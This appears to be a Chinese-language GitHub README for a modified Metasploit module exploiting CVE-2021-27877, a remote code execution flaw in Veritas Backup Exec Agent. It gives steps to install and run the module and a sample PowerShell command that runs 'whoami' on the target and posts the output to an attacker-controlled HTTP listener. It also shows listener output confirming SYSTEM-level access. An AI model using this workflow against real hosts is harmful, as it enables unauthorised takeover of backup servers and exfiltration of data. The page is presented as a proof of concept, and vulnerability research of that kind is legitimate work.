yashswarup12/CVE-2021-27877-PoC
GitHub: yashswarup12/CVE-2021-27877-PoC
这是一个修改版的 Metasploit 漏洞利用模块,通过直接执行命令的方式解决了 CVE-2021-27877 原始模块 payload 传递失败的问题,实现更可靠的漏洞验证。
Stars: 0 | Forks: 0
# CVE-2021-27877 概念验证
此仓库包含一个修改版的 Rapid7 Metasploit 模块,用于验证影响 Veritas Backup Exec Agent 的 CVE-2021-27877 漏洞。
在我的测试过程中,原始的 Metasploit 模块成功地识别出目标存在漏洞,但由于 payload 传递阶段失败,始终无法建立会话。然而,对该模块的分析表明,身份验证和底层的命令执行功能均能正常工作。
为了简化漏洞验证,我修改了该模块,使其通过存在漏洞的 NDMP 命令执行功能直接执行用户提供的操作系统命令,而不是上传和执行 payload。这使得无需依赖反向 shell 或 payload 分阶段传输即可确认远程代码执行。
## 更改内容
与原始的 Rapid7 模块相比,进行了以下修改:
- 添加了一个新的 `COMMAND` 运行时选项。
- 移除了上传 payload 的依赖。
- 执行单个用户指定的命令。
- 不尝试建立 Meterpreter 会话。
## 安装说明
将修改后的模块复制到你本地的 Metasploit 模块目录中。
```
cp beagent_sha_auth_rce_custom.rb /usr/share/metasploit-framework/modules/exploits/multi/veritas/
```
启动(或重启)Metasploit 并重新加载本地模块:
```
msfconsole
reload_all
```
## 使用说明
在运行该模块之前,启动一个 HTTP 监听器(或任何能够接收并显示 HTTP POST 请求的 Web 服务器)。该监听器将接收目标上执行命令的输出。
例如,你可以使用带有自定义请求处理器的简单 Python HTTP 服务器、`nc` 或你选择的任何 HTTP 监听器。
加载该模块:
```
use exploit/multi/veritas/beagent_sha_auth_rce_custom
```
配置所需的选项:
```
set RHOSTS 192.168.x.x
set RPORT 10000
set COMMAND powershell -Command "$output = whoami; Invoke-WebRequest -Uri 'http://192.168.y.y:8080/' -Method POST -Body $output"
run
```
`COMMAND` 选项接受你希望在目标上执行的任何命令。
## 获取命令输出
此模块旨在执行单个命令,且**不会自动返回命令输出**。
要获取输出,请在你的命令中使用适当的回调机制(例如 HTTP POST 请求或其他出站通道),并监控你的监听器。
监听器输出示例:
```
Listening on 0.0.0.0 8080
Connection received on 192.168.x.x 26006
POST / HTTP/ 1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShe11/5.1.14393.9234
Content-Type: application/x-www-form-urlencoded
Host: 192.168.y.y:8080
Content-Length: 19
Expect: 100-continue
Connection: Keep-Alive
nt authority\system
```
## 参考
- [Rapid7 Metasploit 模块](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb)
- [Veritas 安全公告 (VTS21-001)](https://www.veritas.com/support/en_US/security/VTS21-001)
- [Medium 文章](https://yashswarup12.medium.com/cve-2021-27877-analyzing-and-exploiting-veritas-backup-exec-remote-code-execution-5e31bc41eeef)
## 致谢
- 原始 Metasploit 模块:Rapid7
- 修改:Yash Swarup
标签:AI合规, XXE攻击, 编程工具, 远程代码执行